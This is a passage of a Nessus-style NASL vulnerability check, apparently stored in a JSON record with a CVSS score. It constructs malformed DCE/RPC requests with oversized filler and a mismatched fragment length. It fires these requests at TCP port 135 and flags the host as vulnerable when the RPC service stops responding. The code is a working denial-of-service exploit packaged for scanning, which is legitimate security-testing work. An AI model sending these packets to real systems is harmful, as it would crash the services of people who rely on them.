0x00, 0x00, 0x00,\n 0xfe, 0xff, 0x00, 0x00, 0x3d, 0x3d, 0x3d, 0x3d,\n 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d,\n 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d);\n\n return (string(\n req_hdr, req_dt1, req_dt2, req_dt3, req_dt4, req_dt5, req_dt6));\n}\n\n#\n# Prepare evil DCE request II\n# the size does not match fragment length?!\n#\n\nfunction attack_dce_req_2(ah, stuff)\n{\n local_var ah0, ah1, ah2, ah3, req_dt1, req_hdr;\n\n # grrr...nasl barfs on (ah/xx) & 0xff\n ah0 = ah & 0xff;\n ah1 = ah / 256; ah1 = ah1 & 0xff;\n ah2 = ah / 65536; ah2 = ah2 & 0xff;\n ah3 = ah / 16777216; ah3 = ah3 & 0xff;\n\n # Request header\n req_hdr = raw_string(\n 0x05, 0x00, # version, minor version\n 0x00, 0x00, # REQUESTPACKET, flags (none)\n 0x10, 0x00, 0x00, 0x00, # data representation (LE, ASCII, IEEE fp)\n 0xd0, 0x16, # fragment length (5840...hmmm)\n 0x00, 0x00, # auth length\n 0x8f, 0x00, 0x00, 0x00, # call id\n ah0, ah1, ah2, ah3, # alloc hint\n 0x00, 0x00, # context id\n 0x02, 0x00); # opnum: ?\n\n req_dt1 = crap(data:raw_string(stuff), length:5000);\n\n return (string(req_hdr, req_dt1));\n}\n\n#\n# Prepare evil DCE request III\n# this makes absolutely no sense, hmm...\n# the attack appears to work without it...\n#\n\nfunction attack_dce_req_3()\n{\n local_var req_dt1, req_hdr;\n\n # Request header? eh...sort of\n req_hdr = raw_string(\n 0x00, 0x00, 0x01, 0x10, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x01, 0x10, 0x00, 0x00);\n\n req_dt1 = crap(data:raw_string(0x48), length:5000);\n\n return (string(req_hdr, req_dt1));\n}\n\n#\n# Carry out the attack.\n#\n\nfunction attack(port)\n{\n local_var\ti, r, soc;\n # connect\n soc = NULL;\n for (i = 0; i < 3 && ! 
soc; i ++)\n {\n sleep(i);\n soc = open_sock_tcp(port);\n }\n if (!soc) return (1);\n\n # send bind request and check whether we got some reply\n # this is used as a liveness test\n send(socket:soc, data:dce_bind());\n r = recv(socket:soc, length:16);\n if (strlen(r) < 16) return (1);\n\n # send the evil packets\n send(socket:soc, data:attack_dce_req_1());\n send(socket:soc, data:attack_dce_req_2(ah:0x011050, stuff:0x44));\n send(socket:soc, data:attack_dce_req_2(ah:0xf980, stuff:0x45));\n send(socket:soc, data:attack_dce_req_2(ah:0xe2b0, stuff:0x46));\n send(socket:soc, data:attack_dce_req_2(ah:0x1560, stuff:0x47));\n send(socket:soc, data:attack_dce_req_3());\n\n # see you!\n close(soc);\n return (0);\n}\n\n\n#\n# The main program.\n#\n\nport = 135;\n\nif (!get_port_state(port)) {\n exit(0);\n}\n\nmaxtries = 5;\ncountdown = maxtries;\n\nwhile (countdown > 0) {\n success = attack(port:port);\n if (success) {\n if (countdown == maxtries) {\n # XXX it refuses to talk to us\n # XXX should we print a warning?\n exit(0);\n }\n security_warning(port);\n exit(0);\n }\n countdown = countdown - 1;\n sleep(1);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}]}